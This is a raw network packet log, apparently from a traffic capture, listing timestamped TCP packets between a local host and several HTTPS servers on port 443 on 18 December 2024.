                                                                                        Dec 18, 2024 02:10:28.828891039 CET49726443192.168.2.16151.101.2.137
                                                                                        Dec 18, 2024 02:10:28.844384909 CET44349726151.101.2.137192.168.2.16
                                                                                        Dec 18, 2024 02:10:28.844501972 CET44349726151.101.2.137192.168.2.16
                                                                                        Dec 18, 2024 02:10:28.844588995 CET49726443192.168.2.16151.101.2.137
                                                                                        Dec 18, 2024 02:10:28.844589949 CET49726443192.168.2.16151.101.2.137
                                                                                        Dec 18, 2024 02:10:28.844749928 CET49726443192.168.2.16151.101.2.137
                                                                                        Dec 18, 2024 02:10:28.844769001 CET44349726151.101.2.137192.168.2.16
                                                                                        Dec 18, 2024 02:10:28.844780922 CET49726443192.168.2.16151.101.2.137
                                                                                        Dec 18, 2024 02:10:28.844819069 CET49726443192.168.2.16151.101.2.137
                                                                                        Dec 18, 2024 02:10:28.988846064 CET49729443192.168.2.16151.101.2.137
                                                                                        Dec 18, 2024 02:10:28.988869905 CET44349729151.101.2.137192.168.2.16
                                                                                        Dec 18, 2024 02:10:28.988951921 CET49729443192.168.2.16151.101.2.137
                                                                                        Dec 18, 2024 02:10:28.989157915 CET49729443192.168.2.16151.101.2.137
                                                                                        Dec 18, 2024 02:10:28.989175081 CET44349729151.101.2.137192.168.2.16
                                                                                        Dec 18, 2024 02:10:29.640904903 CET44349728104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:29.641226053 CET49728443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:29.641257048 CET44349728104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:29.642347097 CET44349728104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:29.642646074 CET49728443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:29.642774105 CET49728443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:29.642784119 CET44349728104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:29.642824888 CET44349728104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:29.685045004 CET49728443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:30.081434965 CET44349728104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:30.081562996 CET44349728104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:30.081636906 CET49728443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:30.081671000 CET44349728104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:30.082115889 CET44349728104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:30.082181931 CET49728443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:30.082201958 CET44349728104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:30.082829952 CET44349728104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:30.082900047 CET49728443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:30.082912922 CET44349728104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:30.096091986 CET44349728104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:30.096159935 CET49728443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:30.096174002 CET44349728104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:30.108896971 CET44349728104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:30.108968973 CET49728443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:30.108983994 CET44349728104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:30.164094925 CET49728443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:30.201109886 CET44349728104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:30.211935043 CET44349729151.101.2.137192.168.2.16
                                                                                        Dec 18, 2024 02:10:30.212236881 CET49729443192.168.2.16151.101.2.137
                                                                                        Dec 18, 2024 02:10:30.212254047 CET44349729151.101.2.137192.168.2.16
                                                                                        Dec 18, 2024 02:10:30.213134050 CET44349729151.101.2.137192.168.2.16
                                                                                        Dec 18, 2024 02:10:30.213216066 CET49729443192.168.2.16151.101.2.137
                                                                                        Dec 18, 2024 02:10:30.213710070 CET49729443192.168.2.16151.101.2.137
                                                                                        Dec 18, 2024 02:10:30.213768959 CET44349729151.101.2.137192.168.2.16
                                                                                        Dec 18, 2024 02:10:30.214039087 CET49729443192.168.2.16151.101.2.137
                                                                                        Dec 18, 2024 02:10:30.214049101 CET44349729151.101.2.137192.168.2.16
                                                                                        Dec 18, 2024 02:10:30.244059086 CET49728443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:30.244091034 CET44349728104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:30.260034084 CET49729443192.168.2.16151.101.2.137
                                                                                        Dec 18, 2024 02:10:30.275373936 CET44349728104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:30.275476933 CET49728443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:30.275496960 CET44349728104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:30.283795118 CET44349728104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:30.283931971 CET49728443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:30.283946991 CET44349728104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:30.291352034 CET44349728104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:30.291429996 CET49728443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:30.291445017 CET44349728104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:30.305659056 CET44349728104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:30.305735111 CET49728443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:30.305749893 CET44349728104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:30.314939976 CET44349728104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:30.315018892 CET49728443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:30.315032959 CET44349728104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:30.322868109 CET44349728104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:30.322936058 CET49728443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:30.322949886 CET44349728104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:30.330806971 CET44349728104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:30.330893040 CET49728443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:30.330907106 CET44349728104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:30.338987112 CET44349728104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:30.339055061 CET49728443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:30.339070082 CET44349728104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:30.346023083 CET44349728104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:30.346095085 CET49728443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:30.346108913 CET44349728104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:30.352997065 CET44349728104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:30.353063107 CET49728443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:30.353075981 CET44349728104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:30.359945059 CET44349728104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:30.360038042 CET49728443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:30.360050917 CET44349728104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:30.367007971 CET44349728104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:30.367078066 CET49728443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:30.367093086 CET44349728104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:30.367223978 CET44349728104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:30.367275953 CET49728443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:30.367381096 CET49728443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:30.367405891 CET44349728104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:30.508014917 CET49730443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:30.508066893 CET44349730104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:30.508172989 CET49730443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:30.508387089 CET49730443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:30.508405924 CET44349730104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:30.520592928 CET49731443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:30.520668983 CET44349731104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:30.520766973 CET49731443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:30.521017075 CET49731443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:30.521054029 CET44349731104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:30.644687891 CET44349729151.101.2.137192.168.2.16
                                                                                        Dec 18, 2024 02:10:30.689109087 CET49729443192.168.2.16151.101.2.137
                                                                                        Dec 18, 2024 02:10:30.764585018 CET44349729151.101.2.137192.168.2.16
                                                                                        Dec 18, 2024 02:10:30.764599085 CET44349729151.101.2.137192.168.2.16
                                                                                        Dec 18, 2024 02:10:30.764662981 CET44349729151.101.2.137192.168.2.16
                                                                                        Dec 18, 2024 02:10:30.764688015 CET49729443192.168.2.16151.101.2.137
                                                                                        Dec 18, 2024 02:10:30.764714003 CET44349729151.101.2.137192.168.2.16
                                                                                        Dec 18, 2024 02:10:30.764745951 CET44349729151.101.2.137192.168.2.16
                                                                                        Dec 18, 2024 02:10:30.764760971 CET44349729151.101.2.137192.168.2.16
                                                                                        Dec 18, 2024 02:10:30.764784098 CET49729443192.168.2.16151.101.2.137
                                                                                        Dec 18, 2024 02:10:30.764784098 CET49729443192.168.2.16151.101.2.137
                                                                                        Dec 18, 2024 02:10:30.764797926 CET49729443192.168.2.16151.101.2.137
                                                                                        Dec 18, 2024 02:10:30.764811039 CET49729443192.168.2.16151.101.2.137
                                                                                        Dec 18, 2024 02:10:30.882596016 CET44349729151.101.2.137192.168.2.16
                                                                                        Dec 18, 2024 02:10:30.882620096 CET44349729151.101.2.137192.168.2.16
                                                                                        Dec 18, 2024 02:10:30.882644892 CET44349729151.101.2.137192.168.2.16
                                                                                        Dec 18, 2024 02:10:30.882837057 CET49729443192.168.2.16151.101.2.137
                                                                                        Dec 18, 2024 02:10:30.882837057 CET49729443192.168.2.16151.101.2.137
                                                                                        Dec 18, 2024 02:10:30.882852077 CET44349729151.101.2.137192.168.2.16
                                                                                        Dec 18, 2024 02:10:30.882895947 CET49729443192.168.2.16151.101.2.137
                                                                                        Dec 18, 2024 02:10:30.925086975 CET44349729151.101.2.137192.168.2.16
                                                                                        Dec 18, 2024 02:10:30.925126076 CET44349729151.101.2.137192.168.2.16
                                                                                        Dec 18, 2024 02:10:30.925183058 CET49729443192.168.2.16151.101.2.137
                                                                                        Dec 18, 2024 02:10:30.925190926 CET44349729151.101.2.137192.168.2.16
                                                                                        Dec 18, 2024 02:10:30.925394058 CET49729443192.168.2.16151.101.2.137
                                                                                        Dec 18, 2024 02:10:30.925394058 CET49729443192.168.2.16151.101.2.137
                                                                                        Dec 18, 2024 02:10:31.049580097 CET44349729151.101.2.137192.168.2.16
                                                                                        Dec 18, 2024 02:10:31.049607992 CET44349729151.101.2.137192.168.2.16
                                                                                        Dec 18, 2024 02:10:31.049662113 CET49729443192.168.2.16151.101.2.137
                                                                                        Dec 18, 2024 02:10:31.049670935 CET44349729151.101.2.137192.168.2.16
                                                                                        Dec 18, 2024 02:10:31.049705029 CET49729443192.168.2.16151.101.2.137
                                                                                        Dec 18, 2024 02:10:31.049724102 CET49729443192.168.2.16151.101.2.137
                                                                                        Dec 18, 2024 02:10:31.082855940 CET44349729151.101.2.137192.168.2.16
                                                                                        Dec 18, 2024 02:10:31.082891941 CET44349729151.101.2.137192.168.2.16
                                                                                        Dec 18, 2024 02:10:31.082942009 CET49729443192.168.2.16151.101.2.137
                                                                                        Dec 18, 2024 02:10:31.082951069 CET44349729151.101.2.137192.168.2.16
                                                                                        Dec 18, 2024 02:10:31.082983971 CET49729443192.168.2.16151.101.2.137
                                                                                        Dec 18, 2024 02:10:31.083017111 CET49729443192.168.2.16151.101.2.137
                                                                                        Dec 18, 2024 02:10:31.089921951 CET44349729151.101.2.137192.168.2.16
                                                                                        Dec 18, 2024 02:10:31.090009928 CET49729443192.168.2.16151.101.2.137
                                                                                        Dec 18, 2024 02:10:31.090017080 CET44349729151.101.2.137192.168.2.16
                                                                                        Dec 18, 2024 02:10:31.090034008 CET44349729151.101.2.137192.168.2.16
                                                                                        Dec 18, 2024 02:10:31.090080023 CET49729443192.168.2.16151.101.2.137
                                                                                        Dec 18, 2024 02:10:31.090389967 CET49729443192.168.2.16151.101.2.137
                                                                                        Dec 18, 2024 02:10:31.090403080 CET44349729151.101.2.137192.168.2.16
                                                                                        Dec 18, 2024 02:10:31.730053902 CET44349730104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:31.730382919 CET49730443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:31.730412960 CET44349730104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:31.731296062 CET44349730104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:31.731379986 CET49730443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:31.731750011 CET49730443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:31.731812954 CET44349730104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:31.731909990 CET49730443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:31.731925964 CET44349730104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:31.735560894 CET44349731104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:31.735789061 CET49731443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:31.735848904 CET44349731104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:31.737282991 CET44349731104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:31.737365007 CET49731443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:31.737618923 CET49731443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:31.737709045 CET44349731104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:31.737729073 CET49731443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:31.775142908 CET49730443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:31.779371023 CET44349731104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:31.791057110 CET49731443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:31.791080952 CET44349731104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:31.839040041 CET49731443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:32.173425913 CET44349730104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:32.173851967 CET44349730104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:32.173868895 CET44349730104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:32.173907042 CET49730443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:32.173924923 CET44349730104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:32.173974991 CET49730443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:32.174532890 CET44349730104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:32.180538893 CET44349730104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:32.180612087 CET49730443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:32.180620909 CET44349730104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:32.188934088 CET44349730104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:32.188991070 CET49730443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:32.188998938 CET44349730104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:32.198483944 CET44349730104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:32.198561907 CET49730443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:32.198570013 CET44349730104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:32.234889030 CET44349731104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:32.235502005 CET44349731104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:32.235579967 CET49731443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:32.235641956 CET44349731104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:32.236763000 CET44349731104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:32.236824036 CET49731443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:32.236846924 CET44349731104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:32.238143921 CET49730443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:32.239291906 CET44349731104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:32.239386082 CET49731443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:32.239399910 CET44349731104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:32.256171942 CET49733443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:32.256239891 CET44349733104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:32.256318092 CET49733443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:32.256633997 CET49733443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:32.256650925 CET44349733104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:32.286077976 CET49731443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:32.286113024 CET44349731104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:32.292922020 CET44349730104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:32.333067894 CET49731443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:32.333076954 CET49730443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:32.359839916 CET44349731104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:32.360495090 CET44349731104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:32.360584974 CET44349731104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:32.360584974 CET49731443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:32.360614061 CET44349731104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:32.360677004 CET49731443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:32.365417004 CET44349730104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:32.369680882 CET44349730104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:32.369751930 CET49730443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:32.369760990 CET44349730104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:32.377958059 CET44349730104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:32.378041029 CET49730443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:32.378051996 CET44349730104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:32.386334896 CET44349730104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:32.386401892 CET49730443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:32.386409044 CET44349730104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:32.394849062 CET44349730104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:32.394908905 CET49730443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:32.394916058 CET44349730104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:32.403253078 CET44349730104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:32.403330088 CET49730443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:32.403337002 CET44349730104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:32.418030977 CET44349730104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:32.418438911 CET49730443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:32.418447018 CET44349730104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:32.425988913 CET44349731104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:32.426599026 CET44349730104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:32.426656008 CET49730443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:32.426664114 CET44349730104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:32.427401066 CET44349731104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:32.427498102 CET49731443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:32.427560091 CET44349731104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:32.430495024 CET44349731104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:32.430568933 CET49731443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:32.430586100 CET44349731104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:32.436490059 CET44349730104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:32.436556101 CET49730443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:32.436563969 CET44349730104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:32.438769102 CET44349731104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:32.438834906 CET49731443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:32.438848972 CET44349731104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:32.442918062 CET44349730104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:32.442982912 CET49730443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:32.442991018 CET44349730104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:32.446872950 CET44349731104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:32.446947098 CET49731443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:32.446960926 CET44349731104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:32.447021008 CET44349731104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:32.447083950 CET49731443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:32.447189093 CET49731443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:32.447218895 CET44349731104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:32.449356079 CET44349730104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:32.449417114 CET49730443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:32.449424982 CET44349730104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:32.449908972 CET49734443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:32.449935913 CET44349734104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:32.450028896 CET49734443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:32.450269938 CET49734443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:32.450282097 CET44349734104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:32.455868959 CET44349730104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:32.455929995 CET49730443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:32.455936909 CET44349730104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:32.462279081 CET44349730104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:32.462354898 CET49730443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:32.462357998 CET44349730104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:32.462408066 CET49730443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:32.462637901 CET49730443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:32.462650061 CET44349730104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:33.485843897 CET44349733104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:33.486187935 CET49733443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:33.486215115 CET44349733104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:33.486706972 CET44349733104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:33.487047911 CET49733443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:33.487142086 CET44349733104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:33.487173080 CET49733443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:33.527338028 CET44349733104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:33.531086922 CET49733443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:33.671211004 CET44349734104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:33.671515942 CET49734443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:33.671525955 CET44349734104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:33.672610044 CET44349734104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:33.672933102 CET49734443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:33.673083067 CET49734443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:33.673088074 CET44349734104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:33.673103094 CET44349734104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:33.723056078 CET49734443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:33.931783915 CET44349733104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:33.932193995 CET44349733104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:33.932252884 CET49733443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:33.932312012 CET44349733104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:33.933041096 CET44349733104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:33.933079004 CET44349733104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:33.933099031 CET49733443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:33.933123112 CET44349733104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:33.933170080 CET49733443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:33.940260887 CET44349733104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:33.952716112 CET44349733104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:33.952747107 CET44349733104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:33.952826023 CET49733443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:33.952857971 CET44349733104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:33.952920914 CET49733443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:34.051371098 CET44349733104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:34.055444002 CET44349733104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:34.055512905 CET49733443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:34.055546999 CET44349733104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:34.100085974 CET49733443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:34.118686914 CET44349734104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:34.118865013 CET44349734104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:34.118944883 CET49734443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:34.119472027 CET49734443192.168.2.16104.18.95.41
                                                                                        Dec 18, 2024 02:10:34.119482994 CET44349734104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:34.122577906 CET49735443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:34.122639894 CET44349735104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:34.122711897 CET49735443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:34.122941017 CET49735443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:34.122976065 CET44349735104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:34.123543024 CET44349733104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:34.129228115 CET44349733104.18.95.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:34.129287958 CET49733443192.168.2.16104.18.95.41
